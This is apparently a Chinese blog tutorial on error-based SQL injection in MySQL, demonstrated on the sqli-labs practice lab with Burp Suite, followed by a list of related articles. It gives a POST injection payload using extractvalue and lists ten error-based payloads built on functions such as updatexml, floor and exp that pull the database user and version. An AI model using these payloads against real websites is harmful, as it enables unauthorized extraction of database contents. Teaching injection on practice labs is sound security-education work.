day6-SQL注入之报错回显

最新推荐文章于 2026-01-17 11:09:10 发布
原创 最新推荐文章于 2026-01-17 11:09:10 发布 · 953 阅读 · 21 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#sql #数据库 #网络安全 #web安全

学习目标:

报错注入利用了数据库在遇到错误时返回的详细错误信息。攻击者通过构造恶意 SQL 查询,使数据库抛出异常,并从异常信息中提取数据库结构、表名、列名等敏感信息。
报错注入需要用到的两个数据库函数
1.updatexml():从目标XML中更改包含所查询值的字符串
2.extractvalue():从目标XML中返回包含所查询值的字符串

函数格式

updatexml():从目标XML中更改包含所查询值的字符串

第一个参数:XML_document 是String格式,为XML文档对象的名称,文中为DOC

第二个参数:XPath_string(Xpath格式字符串)

第三个参数:new_value,String格式,替换查找到的符合条件的数据

extractvalue():从目标XML中返回包含所查询值的字符串

第一个参数:XML_document 是String格式,为XML文档对象的名称,文中为DOC

第二个参数:XPath_String (Xpath格式字符串)

报错原理

这两个函数中的第二个参数要求我们传入的都是Xpath类型的数据,至于什么是Xpath类型的数据呢照我的理解就是文件路径,我们通过在这个参数位置上输入MySQL代码来实现报错反馈。

学习内容:

接下来我们依然采用sqli-labs中的关卡来演示如何使用报错回显来获取数据
本次我们使用的是第五关,采用post的方式进行注入,
根据上一期我们已经学会了利用burp suite进行抓包,依然进行截取然后输入以下代码

uname=zhansan' union select 1,extractvalue(1,concat('~'(select version()),'~')) #&passwd=12345&submit=Submit

这里要注意一点函数内部使用sql语句时我们要加括号举例
concat(1,(select 1,2))
在这里插入图片描述
改好之后我们进行放行
在这里插入图片描述
这样我们就拿到了想要的数据

代码解析

uname=zhansan’ union select 1,extractvalue(1,concat(‘~’,(select version()),‘~’)) #
此代码是采用extract value函数进行回显报错,可以回到上面看到,此函数需要两个参数,第一个我们随便填,填1就可以了,第二个参数需要我们填写Xpath参数,但是我们在此注入是获取数据库的函数,这时此代码就会报错回显,在回显的过程中就会将我们第二个参数输出出来(也就是我们的代码),此时浏览器就会执行这句代码从而拿到我们要获取的数据
concat()函数的作用,我先给大家看一下不加concat的效果
在这里插入图片描述
可以看到我们拿到的数据是不完整的,所以需要整合以下,至于前后为什么要加~号,是因为后期我们采用工具注入时方便获取,记住就行我也是强记的。

其他语句

我还收集了以下其他的报错函数,大家可以自己去实验以下,具体的用法也可以百度一下
1.floor()

select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);

2.extractvalue()

select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));

3.updatexml()

select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));

4.geometrycollection()

select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));

5.multipoint()

select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));

6.polygon()

select * from test where id=1 and polygon((select * from(select * from(select user())a)b));

7.multipolygon()

select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));

8.linestring()

select * from test where id=1 and linestring((select * from(select * from(select user())a)b));

9.multilinestring()

select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));

10.exp()

select * from test where id=1 and exp(~(select * from(select user())a));

总结

这一期还是比较好理解的,总体就是利用函数的报错将我们语句进行输出出来,从而拿到我们想要的信息

小迪安全Day44WEB攻防-PHP应用&SQL盲注 &布尔&延时判断&报错处理&增删改查方式
2302_79025174的博客
09-18 812
小迪这个页面就是典型的没有,他的后端写的就是只判断sql语句是否成功,但是不输出内容,这时候可以用时间盲注或者报错注入来进行操作,这里随便输入删除新闻的id但是后面要用or 不用and 因为你也不知道新闻的id是多少,所以用or进行连接,两个符合一个即可,但是前边的语句执行了or后面就不执行了。4%20or%20if(ord(left(database(),1))=107,sleep(3),sleep(0)),可以看到第一个字母就是k。
MySQL注入之错误
震山的博客
09-07 455
利用错误来获取重要信息
(手工)【sqli-labs13-14】POST注入报错(基本步骤)
07-07 969
SQL-POST】报错
SQL注入-报错注入:简介、相关函数、利用方法
05-29 2446
SQL注入-
updatexml()和extractvalue()报错注入原理
Fly_Mojito的博客
06-14 738
updatexml()和extractvalue()报错注入原理
(16)【SQL盲注】基础函数、报错、延时判断、逻辑判断盲注
02-25 2433
适合新手看的盲注
xd_day44WEB攻防-PHP应用&SQL盲注&布尔&延时判断&报错处理&增删改查方式
最新发布
hzb66666的博客
01-17 748
找insrt注入,直接全局搜insert它的访问不是只files/submit.php直接访问示找到这里提交 数据插入语句有@mysql_query($query) or die('新增错误:'.mysql_error());就有报错注入的可能1. 先明确闭合逻辑代码里的VALUES中,所有变量(比如$content)都被(比如'$content'所以注入的关键是,让我们构造的 SQL 语句能被执行。2. 具体闭合方式(以$content为例)假设$content。
Day44:WEB攻防-PHP应用&SQL盲注&布尔&延时判断&报错处理&增删改查方式
qq_61553520的博客
03-23 1313
小迪安全-Day44:WEB攻防-PHP应用&SQL盲注&布尔&延时判断&报错处理&增删改查方式
SQL注入:二次注入
qq_68163788的博客
01-29 3935
二次注入SQL注入攻击的一种变体,它发生在应用程序对用户输入进行了过滤和防御措施的情况下。在这种情况下,攻击者可能会利用应用程序中的另一个漏洞,例如存储型XSS漏洞,来注入恶意的SQL代码。这种情况下,攻击者利用应用程序中的另一个漏洞来实现对数据库注入攻击,因此被称为二次注入。 要防止二次注入攻击,开发人员需要实施全面的安全措施,包括对用户输入进行严格的验证和过滤,使用参数化查询或者存储过程等安全数据库访问方法,以及定期进行安全审计和漏洞扫描。
【初步了解】报错注入原理和常用报错注入函数
2402_87815315的博客
12-09 2464
通常情况下,我们会利用floor()函数对某个数值类型的字段进行向下取整操作,然后使用group by子句按照取整后的结果进行分组,再通过count()函数来统计每组内的记录数量。这样的组合常用于对数据按照一定区间进行归类统计,比如按照时间区间(将时间戳向下取整到某个时间粒度,如按小时、按天等)统计记录个数,或者对数值范围进行分组统计等场景。
记手工SQL数字注入
weixin_40418457的博客
08-16 348
前言 已经检测出该网站有sql注入问题,试着手工注入网站,顺便再复习一下 正文 1.先通过引号 判断该网站为数字型,payload直接拼接,无需引号闭合,当网站后直接构造拼接 and 0# 网站文章列表内容受到影响示空白,此为类型注入 payload: and 0# 2.进行字段数的猜解,确定位 字段数猜解通过payload:ORDER BY X # 对X字段进行字段值猜解,此网站X=6时,网站示正常则确定字段数为6 构造payload:UNION SELECT 1,2,3,4,5,6
基于错误sql注入整理
ailugong8410的博客
06-08 541
  由于复习,停了好几天,今天换换模式做了一下关于错误的ctf题目,首先附上题目:here   整理了一下网上的一些关于错误的方法,在这里就不带上地址了,请大牛们原谅:P   0x00 关于错误     用我自己的话来讲,基于错误sql注入就是通过sql语句的矛盾性来使数据被到页面上(当然在实际应用中得能在页面上,一般的网站都避免这种情况,哈哈,要是能碰...
mysql错误注入_SQL注入注入
weixin_35308770的博客
01-28 947
注入本质?1、 SQL注入是最常见的注入。2、 注入攻击的本质,是把用户输入的数据当做SQL语句执行。3、 这里有两个关键条件:第一个是用户能够控制输入。第二个是原本程序要执行的代码,拼接了用户输入的数据,然后进行执行。渗透测试常用函数。1、GROUP_CONCAT(col):返由属于一组的列值连接组合而成的结果。例如:id=9.9 union select 1,GROUP_CONCAT(...
界面出现&nbsp解决方法
樊建华
08-16 2663
最近在解决一个问题,就是这个 在界面的时候会出现&nbsp的样式 这是因为在MySQL中,空格是用&nbsp表示的,所以在的过程中,HTML界面就会示的这个了。 那么怎么去掉他呢? 我的解决方法是直接在前台进行转义,通过扫描字符串,替换实现的。 部分代码: ngOnInit() { if (this.question.writedAnswerL...
SQL报错型盲注教程(原理全剖析)
热门推荐
Pz_mstr's Blog
08-21 1万+
深入分析基于报错sql盲注原理,解密“公式”的奥秘
渗透测试-百日筑基—SQL注入篇&联合&Boolean&报错&注入—中
LANDUOSHUREN的博客
10-23 1282
渗透测试-百日筑基-day7—SQL注入篇&注入的类型&流程&攻击union 联合注入原理1. 基本概念2. 攻击场景3. 攻击步骤4. 前置条件5. SQL注入中的UNION联合注入原理主要基于以下几个方面:6. 防御措施一、Union联合注入攻击1、上面详细介绍了原理,现在来分析有sql注入漏洞的代码,通过分析代码,更深入地了解sql注入漏洞2、当传入1时,页面正常返用户信息3、如果传入1'语法会出现语句You have an error in your SQL syntax;这是mysql语法错
Web安全Day1 - SQL注入、漏洞类型
念舒C.ying
10-19 1786
结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。1986年10月,美国国家标准学会对SQL进行规范后,以此作为关系式数据库管理系统的标准语言(ANSI X3. 135-1986),1987年得到国际标准组织的支持下成为国际标准。不过各种通行的数据库系统在其实践过程中都对SQL规范作了某些编改和扩充。所以,实际上不同数据库系统之间的SQL不能完全相互通用。
Web安全Day1 - SQL注入实战攻防
hongrisec的博客
02-20 3448
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.Web安全Day1 - SQL注入实战攻防 https://mp.weixin.qq.com/s/zP0MZNhnZG_S9aoHDXzvWA 1. SQL注入 1.1 漏洞简介 结构化查询语言(Structured Query Language...
CTF-SQL注入
m0_74317362的博客
07-25 1185
加有
SQL--报错注入
weixin_30412577的博客
08-21 366
1、floor()函数 原理: 利用rand()函数与group()函数的相互冲突,floor()是向下取整函数,floor(9.99)=9.0 语法结构: username=admin' and (select 1 from (select count(*), concat(floor(rand(0)*2),0x23,你想获取的数据的sql语句)x from information_sc...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值